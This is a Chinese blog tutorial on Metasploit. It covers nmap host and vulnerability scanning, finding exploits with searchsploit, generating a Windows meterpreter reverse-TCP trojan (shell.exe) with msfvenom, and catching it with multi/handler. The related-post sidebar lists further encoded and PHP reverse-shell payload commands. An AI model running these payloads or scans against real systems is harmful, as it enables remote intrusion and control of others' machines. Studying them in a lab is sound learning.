msf的用法,msfvenom生成shell

已于 2023-10-04 15:24:14 修改
阅读量189 收藏 1
点赞数
文章标签: 安全 学习
于 2023-10-02 13:01:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xkhf1/article/details/133489965
版权
1. msf使用:

使用前的准备:

  1. 连接msf的数据库,启动msf数据库systemctl start postgresql

  2. 先用nmap扫描:

    1. nmap -sn 192.168.137.0/24,看看哪些主机存活。

    2. nmap --min-rate 10000 -p- 192.168.137.128 ,用最慢10000的速度扫描ip端口。

    3. nmap --script=vuln -p 刚刚扫出来开放的端口号 192.168.112.158去扫描一下开放的端口号存在哪些可以利用的漏洞编号。

    4. 这一步也可以在msf里使用msf的nmap。如:db_nmap -sn 192.168.137.0/24,都是一样的

启动msf:

  1. msfconsole启动msf

  2. 找到漏洞编号之后,search 漏洞编号,找到suxiliary开头的辅助模块,先探测一下这个漏洞是否可能利用,比如是第4个,那么就use 4,也可以use 具体文件的位置exploit开头的则是exp漏洞利用模块,先探测如果可行,再使用exp模块,使用方法一样。这个是在库里搜索漏洞编号,如果没有可以利用的exp,可以直接在kali命令行searchsploit 漏洞编号看看在线库是否有可利用的exp。

  3. 进入到模块之后,show options看一下当前模块的选项。

  4. 必选的选项但是没值的话,要set上,比如:set rhosts 192.168.137.131rhosts表示目标主机。

  5. 都设置好之后可以run.

在这里插入图片描述

利用searchsploit找漏洞并利用:

  1. 如果msf自带的库里search不到,那么利用之前信息搜集收集到的web容器版本,数据库版本,操作系统版本等,用searchsploit 搜索漏洞,如:searchsploit dirty 搜索dirty的cms漏洞。

    在这里插入图片描述

  2. 得到代码名之后,searchsploit -p 40847 显示文件位置。

    在这里插入图片描述

  3. 然后具体的编译命令和用法在文件里都有说明,直接在文件里找。如:

    在这里插入图片描述

msfvenom生成木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.112.148 LPORT=4444 -f exe -o shell.exe 用msfvenom模块生成一个基于tcp的反弹shell木马为shell.exe,攻击机为:192.168.112.148,监听端口为:4444 ,-f是生成的木马类型,这里是.exe文件,-o是指定名字,也可以用>代替,如:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.112.148 LPORT=4444 -f exe > shell.exe

​ 此时生成的是一个.exe文件,我们需要将这个.exe文件交给目标,让目标把.exe文件放在目标主机上我们才能运行,或者我们可以上传到目标主机。

接受:
  1. 在msf中打开MSF的监听:use exploit/multi/handler
  2. set payload windows/meterpreter/reverse_tcp 指定payload,这个payload就是刚刚上面使用的payload
  3. show options
  4. set lhost 192.168.112.148 指定攻击机的地址
  5. set lport 4444 指定攻击机打开的监听端口
  6. run
Xkhf1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
msfvenom获取shell
01-03
msfvenom各平台生成木马大全: windows: msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘x00x0axff’ -i 3 -f exe -opayload....
利用msfvenom生成木马文反弹shell
dreamthe的博客
11-19 4099
1.安装靶机和攻击机 首先自己是在虚拟机完的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win 7 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。 kali的下载地址Get Kali | Kali Linux: 在虚拟机里面直接选择打开就可以了。 攻击机 kali ip是192.168.3.138 靶机 win server 2008 R2 ip是192.168.3.147 ...
MSFconsole进阶】Msfvenom后门生成模块:使用方法、shell生成、各种格式生成
05-24 1768
【渗透工具】MSFconsole进阶:Msfvenom(后门生成模块)
kali-msfvenom生成远控木马
Ryongao
01-16 527
本文章仅限于网络安全教学,严禁用于非法途径。若有人因此作出危害网络安全行为后果自负,与本人无关。
网络安全-木马入侵windows -msfvenom反弹shell(CMD)
weixin_48137911的博客
02-19 5564
需要做什么呢漏洞与木马的区别在于漏洞是某个系统某个框架,才能用特定的环境下才可以但是木马是全部机器都可以用因为木马相当于软如果你电脑不能安装软那你这个电脑也没啥用。
柠檬:简单的MSFVenom有效负载生成
02-14
柠檬 一个简单的MSFVenom有效载荷生成器 安装 git clone https://github.com/spicesouls/lemon cd lemon bash setup.sh python3 lemon.py
php-msf源码详解
10-18
主要介绍了php-msf源码的意思以及用法相关问题,有需要的朋友跟着参考学习下吧。
msf使用方法
06-29
msf使用方法,很详细,你值得拥有
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
NewsMash的博客
05-15 136
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
安全+大模型应用系列之RSAC的Dropzone AI的分析
si1ence的博客
05-17 397
从Dropzone AI广泛的认可度来看,国外对该思路的认可度较好,前期在国内项目验证的时候客户也非常感兴趣。但是目前国内的安全产品、安全平台较为封闭、无法像国外产品能够广泛直接对接、或许是当前制约国内的安全GPT广泛推广的一个阻碍; 安全+大模型的产品的逐渐按照多能力的安全专家(全能)的能力和价值去规划、应该是一个受客户认可的正确方向。
Nginx - 安全基线配置与操作指南
小工匠
05-19 912
我们这里主要介绍针对Nginx中间安全基线配置指南,包括版本选择、用户创建、权限设置、缓冲区配置、日志管理、访问限制、错误页面处理、并发控制、补丁更新等方面。同时还涵盖了如何配置正向代理模块、防止目录遍历以及服务监控等内容,旨在指导系统管理员确保中间服务器的安全性本文档规定了中间服务器应当遵循的安全性设置标准,旨在指导系统管理人员或安全检查人员进行中间安全合规性检查和配置。
[图解]SysML和EA建模住宅安全系统-07 to be块定义图
rolt的专栏
05-21 660
然后再针对这个画一个块内部图,然后这里再把签名拖上去
HLS视频加密,让您的视频内容更安全
云存储小天使的博客
05-21 420
HLS视频加密是一种基于HTTP Live Streaming(HLS)协议的加密技术。它的核心思想是将视频切片进行加密处理,在客户端播放时需要先获取解密密钥才能正常偶发。通过这种方式,HLS加密可以有效防止未经授权的第三方窃取视频内容,从而保障了视频内容的版权和安全。数据万象媒体处理服务提供了一套HLS视频加密方案,方便用户各个场景的需求。
如何选择一款安全高效的数据自动同步工具?
文件数据安全交换
05-21 169
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文传输自动化和传输集等各种数据传输场景。由于大部分的数据都是需要实时的同步到其他节点进行使用和分析的,原有的数据传输方式没有任何的消息通知,也没有日志记录可查询,需要靠人工去各个节点确认,费时费力,效率低下;提供完善的数据同步日志和用户操作日志,便于查询和审计,快速排查错误或遗漏。
深度学习之基于YoloV5的建筑场所安全检测系统
2301_79810943的博客
05-21 250
一、项目背景与目标随着城市化进程的加速,建筑场所的安全问题日益受到关注。为了实现对建筑场所的全面、实时监控,并及时发现潜在的安全隐患,本项目旨在利用深度学习技术,开发一个基于YoloV5算法的建筑场所安全检测系统。二、技术选型与特点YoloV5算法:本项目采用YoloV5作为核心检测算法。YoloV5以其高精度、快速检测速度和强大的多尺度检测能力著称,非常适合用于复杂建筑场所的安全检测。
检测高空作业人员安全绳是否佩戴系统
最新发布
燧机科技的博客
05-21 139
检测高空作业人员安全绳是否佩戴系统基于AI视觉智能分析算法,检测高空作业人员安全绳是否佩戴系统通过现场摄像头对高处作业区域内的人员进行自动检测识别。系统能够快速、准确地检测高空作业人员是否佩戴安全绳。一旦系统检测到人员未佩戴安全绳,会立即进行告警,并将告警信息推送给相关管理者。检测高空作业人员安全绳是否佩戴系统通过实时检测和告警,系统可以及时发现安全隐患,并采取相应措施防范事故的发生。该系统采用视频图像自动识别的形式,不需要新增硬,实时监控识别,实时告警,简单方便。
智慧园区EasyCVR视频智能管理方案:构建高效安全园区新视界
TSINGSEE青犀视频官方技术博客
05-15 472
睡岗离岗检测:检测消控室值班员值岗情况,当发生脱岗、睡岗等问题时,即时报警,避免发生事无人响应情形。
msf生成php反弹shell
09-21
生成PHP反弹shell,你可以使用以下命令: msfvenom -p php/meterpreter/reverse_tcp LHOST=<你的IP地址> LPORT=<你要连接的端口> -f raw > shell.php 这个命令将生成一个名为shell.php的PHP文,其中包含一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值